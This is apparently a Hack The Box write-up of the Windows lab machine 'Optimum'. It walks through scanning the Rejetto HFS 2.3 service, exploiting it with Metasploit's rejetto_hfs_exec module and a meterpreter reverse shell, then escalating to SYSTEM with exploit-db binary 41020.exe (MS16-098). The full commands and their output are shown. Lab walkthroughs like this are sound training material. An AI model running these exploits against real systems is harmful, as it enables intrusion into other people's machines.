# Optimum Writeup ![](img/5.png) ## Introduction : Optimum was an easy Windows box released back in March 2017. ## **Part 1 : Initial Enumeration** As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions. **λ nihilist [nihilist/_HTB/Optimum] → nmap -sC -sV 10.10.10.8** Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-10 14:48 CET Nmap scan report for 10.10.10.8 Host is up (0.037s latency). Not shown: 999 filtered ports PORT STATE SERVICE VERSION 80/tcp open http HttpFileServer httpd 2.3 |_http-server-header: HFS 2.3 |_http-title: HFS / Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 13.49 seconds Browsing to http://10.10.10.8/ gives us the main page of rejetto's HttpFileServer 2.3 service as planned. ![](prg/5_001.png)![](prg/5_002.png) ## **Part 2 : Getting User Access** Let's use the **nikto** command to enumerate potential vulnerabilities on the Http service. **λ root [nihilist/_HTB/Optimum] → nikto -h http://10.10.10.8/** - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 10.10.10.8 + Target Hostname: 10.10.10.8 + Target Port: 80 + Start Time: 2019-11-10 15:02:06 (GMT1) --------------------------------------------------------------------------- + Server: HFS 2.3 + Cookie HFS_SID created without the httponly flag + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + No CGI Directories found (use '-C all' to force check all possible dirs) + ERROR: Error limit (20) reached for host, giving up. Last error: + Scan terminated: 0 error(s) and 4 item(s) reported on remote host + End Time: 2019-11-10 15:02:50 (GMT1) (44 seconds) --------------------------------------------------------------------------- + 1 host(s) tested Let's use the **searchsploit** command to see which exploits are publicly available for rejetto's HttpFileServer service. **λ root [nihilist/_HTB/Optimum] → searchsploit rejetto** --------------------------------------------------------------------------- ---------------------------------------- Exploit Title | Path | (/usr/share/exploitdb/) --------------------------------------------------------------------------- ---------------------------------------- Rejetto HTTP File Server (HFS) - Remote Command Execution (Metasploit) | exploits/windows/remote/34926.rb Rejetto HTTP File Server (HFS) 1.5/2.x - Multiple Vulnerabilities | exploits/windows/remote/31056.py Rejetto HTTP File Server (HFS) 2.2/2.3 - Arbitrary File Upload | exploits/multiple/remote/30850.txt Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1) | exploits/windows/remote/34668.txt Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2) | exploits/windows/remote/39161.py Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Execution | exploits/windows/webapps/34852.txt --------------------------------------------------------------------------- ---------------------------------------- Shellcodes: No Result it seems that there are Remote Command Execution Vulnerabilities. We will use a metasploit module to exploit the target. **msf5 > search rejetto** Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/windows/http/rejetto_hfs_exec 2014-09-11 excellent Yes Rejetto HttpFileServer Remote Command Execution **msf5 > use exploit/windows/http/rejetto_hfs_exec** **msf5 exploit(windows/http/rejetto_hfs_exec) > set RHOST 10.10.10.8** RHOST => 10.10.10.8 **msf5 exploit(windows/http/rejetto_hfs_exec) > set RPORT 80** RPORT => 80 **msf5 exploit(windows/http/rejetto_hfs_exec) > set SRVHOST 10.10.14.48** SRVHOST => 10.10.14.48 **msf5 exploit(windows/http/rejetto_hfs_exec) > set SRVPORT 9001** SRVPORT => 9001 **msf5 exploit(windows/http/rejetto_hfs_exec) > set LHOST 10.10.15.150** LHOST => 10.10.15.150 **msf5 exploit(windows/http/rejetto_hfs_exec) > set LPORT 9002** LPORT => 9002 **msf5 exploit(windows/http/rejetto_hfs_exec) > set PAYLOAD windows/x64/meterpreter/reverse_tcpset** **msf5 exploit(windows/http/rejetto_hfs_exec) > exploit** [*] Started reverse TCP handler on 10.10.14.48:9002 [*] Using URL: http://10.10.14.48:9001/7WzzcN0iSur [*] Server started. [*] Sending a malicious request to / [*] Payload request received: /7WzzcN0iSur [*] Sending stage (180291 bytes) to 10.10.10.8 [*] Meterpreter session 1 opened (10.10.14.48:9002 -> 10.10.10.8:49184) at 2019-11-10 15:27:23 +0100 [!] Tried to delete %TEMP%\XAzNIKQmr.vbs, unknown result [*] Server stopped. **meterpreter > sysinfo** Computer : OPTIMUM OS : Windows 2012 R2 (6.3 Build 9600). Architecture : x64 System Language : el_GR Domain : HTB Logged On Users : 1 Meterpreter : x86/windows **meterpreter > shell** Process 1992 created. Channel 2 created. Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. **C:\Users\kostas\Desktop>whoami** whoami optimum\kostas Meterpreter Returned ! we are now logged on as kostas into a low-privilege shell. ## **Part 3 : Getting Root Access** Now we need to use the exploit n°41020 taking advantage of RGNOBJ's Integer OVerflow on Windows 8.1 (MS16-098) We will download 41020.exe from exploit-db's collection of binary exploits available on github. _Terminal n°1:_ **wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe** --2019-11-10 15:37:28-- https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe Loaded CA certificate '/etc/ssl/certs/ca-certificates.crt' Resolving github.com (github.com)... 140.82.118.3 Connecting to github.com (github.com)|140.82.118.3|:443... connected. HTTP request sent, awaiting response... 302 Found Location: https://raw.githubusercontent.com/offensive-security/exploitdb-bin-sploits/master/bin-sploits/41020.exe [following] --2019-11-10 15:37:28-- https://raw.githubusercontent.com/offensive-security/exploitdb-bin-sploits/master/bin-sploits/41020.exe Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.120.133 Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.120.133|:443... connected. HTTP request sent, awaiting response... 200 OK Length: 560128 (547K) [application/octet-stream] Saving to: ‘41020.exe’ 41020.exe 100%[==============================================>] 547.00K 840KB/s in 0.7s 2019-11-10 15:37:30 (840 KB/s) - ‘41020.exe’ saved [560128/560128] We downloaded the binary, now let's upload it to the server using metasploit, and execute it to attempt getting an elevated privilege shell. _Terminal n°2:_ **meterpreter > upload 41020.exe** [*] uploading : 41020.exe -> 41020.exe [*] Uploaded 547.00 KiB of 547.00 KiB (100.0%): 41020.exe -> 41020.exe [*] uploaded : 41020.exe -> 41020.exe meterpreter > shell Process 900 created. Channel 4 created. Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. **C:\Users\kostas\Desktop>41020.exe** 41020.exe Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. **C:\Users\kostas\Desktop>whoami** whoami nt authority\system The privilege escalation was successful ! Now all that's left to do is collecting the user and root flags. **C:\Users\kostas\Desktop>cd ..\..\..** **C:\>more C:\Users\kostas\Desktop\user.txt.txt** more C:\Users\kostas\Desktop\user.txt.txt d0XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX **C:\>more C:\Users\Administrator\Desktop\root.txt** more C:\Users\Administrator\Desktop\root.txt 51XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX ## **Conclusion** Here we can see the progress graph : ![](img/5_graph.png)